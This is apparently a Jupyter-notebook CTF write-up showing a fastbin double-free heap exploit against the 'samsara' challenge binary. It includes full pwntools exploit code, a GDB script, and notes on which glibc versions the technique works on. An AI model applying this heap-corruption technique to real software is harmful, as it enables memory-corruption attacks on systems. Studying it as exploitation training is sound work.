# Fastbin Double Free Attack

Only work before glibc 2.28 (inclusive). In 2.29, the tcache checks whether there are duplicated chunks. The tcache is introduced in 2.26.

## Example: samsara

Source: MetasequoiaCTF 202002020-0221

This program provides four actions:

- `data[count++] = malloc(8)`, where `count` is a counter which increases by one on each call to `malloc`.
- `free(data[i])`, where `i` is read from the stdin.
- `data[i] = x`, where `i` and `x` are read from the stdin.
- Get the address of a variable `ref` on the stack and set the value of `ref`.

Our goal is to set the value of a variable `flag` on the stack to `0xdeadbeef`.


In [1]:
bin_filename = './samsara'
from pwn import *
from pwnlib import gdb

context.terminal = ['tmux', 'new-window']
elf = ELF(bin_filename)
# print(elf.checksec())

[*] '/ctf/work/fastbin-double-free/samsara'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled


The key idea is to construct a fake chunk whose data is `flag`. To do this, let's examine the stack layout:

```c
int current_cnt; // ebx
int action; // [rsp+Ch] [rbp-44h] BYREF
int index; // [rsp+10h] [rbp-40h] BYREF      <---- prev  (fake chunk begin here)
__gid_t rgid; // [rsp+14h] [rbp-3Ch]         <---- prev+4
__int64 ref; // [rsp+18h] [rbp-38h] BYREF    <---- size  (fake chunk size should be 0x20)
__int64 flag; // [rsp+20h] [rbp-30h]         <---- mem / fd
__int64 v10; // [rsp+28h] [rbp-28h] BYREF    <---- bk
__int64 tmp[4]; // [rsp+30h] [rbp-20h] BYREF
```

In [2]:
def wait_for_prompt(io: tube):
    io.recvuntil(b'> ')

def call_malloc(io: tube):
    wait_for_prompt(io)
    io.sendline(b'1')

def call_free(io: tube, i):
    wait_for_prompt(io)
    io.sendline(f'2 {i}'.encode())

def call_set_value(io: tube, i, x):
    wait_for_prompt(io)
    io.sendline(f'3 {i} {x}'.encode())
    
def call_set_ref(io: tube, x):
    wait_for_prompt(io)
    io.sendline(f'5 {x}'.encode())
    
def call_get_ref(io: tube) -> int:
    wait_for_prompt(io)
    io.sendline(b'4')
    io.recvuntil(b'Your lair is at: ')
    v = io.recvline()
    v = int(v.decode(), 16)
    return v

def call_print_flag(io: tube):
    wait_for_prompt(io)
    io.sendline(b'6')

def exploit(io, fake_chunk_offset):
    call_malloc(io)  # data[0] -> chunk 0
    call_malloc(io)  # data[1] -> chunk 0
    call_free(io, 0) # chunk 0
    call_free(io, 1) # chunk 0 -> chunk 1
    call_free(io, 0) # chunk 0 -> chunk 1 -> chunk 0
    call_malloc(io)  # data[2] -> chunk 0
    call_malloc(io)  # data[3] -> chunk 1
    ref_addr = call_get_ref(io)
    print(f"{hex(ref_addr)=}")
    fake_chunk_addr = ref_addr + fake_chunk_offset
    call_set_ref(io, 0x20) # fake chunk size
    call_set_value(io, 2, fake_chunk_addr)  # chunk 0 -> fake chunk
    call_malloc(io)  # data[4] -> chunk 0
    call_malloc(io)  # data[5] -> fake chunk
    call_set_value(io, 5, 0xdeadbeef)
    call_print_flag(io)
 

Run the GDB as in the below code, we can see how the block list changes. With glibc 2.24, the output is:

```
0x55555561b030 --> 0x55555561b010 --> 0x0
0x55555561b010 --> 0x55555561b030 --> 0x55555561b010 (overlap chunk with 0x55555561b010(freed) ) 
0x55555561b010 --> 0x7fffffffed10 --> 0x0 
```

In [3]:
!ls /glibc
glibc = "2.27"
context.aslr = False
!patchelf --set-interpreter '/glibc/{glibc}/64/lib/ld-{glibc}.so' {bin_filename}
io = gdb.debug([bin_filename],
               env={"LD_PRELOAD": "/glibc/{glibc}/64/lib/libc.so"},
               gdbscript="""
# break before taking an action
b *0x555555400b40
commands
  silent
  parseheap
  heapinfo
end

b *0x555555400d38
commands
  printf "You get the flag"
end
c

# before double free
c 4
# double free!
c 1
# construct the fake chunk
c 5
# set deadbeef
c 3
# show the content of the fake chunk
x/4g 0x7fffffffed10

c
quit
set context-output /dev/null
""")
try:
    if glibc <= "2.25":
        offset = -0x8
    else:
        # in tcache, the fd pointer points to chunk+0x10
        offset = 0x8
    exploit(io, offset)
    io.poll(block=True)
except Exception as e:
    io.kill()
    raise e

2.19  2.23  2.24  2.27	2.28  2.29  2.30
[!] Debugging process with ASLR disabled
[x] Starting local process '/usr/bin/gdbserver'
[+] Starting local process '/usr/bin/gdbserver': pid 1271
[*] running in new terminal: /usr/bin/gdb -q  "./samsara" -x /tmp/pwn5vztgbhh.gdb
hex(ref_addr)='0x7fffffffed18'
[*] Process '/usr/bin/gdbserver' stopped with exit code 0 (pid 1275)
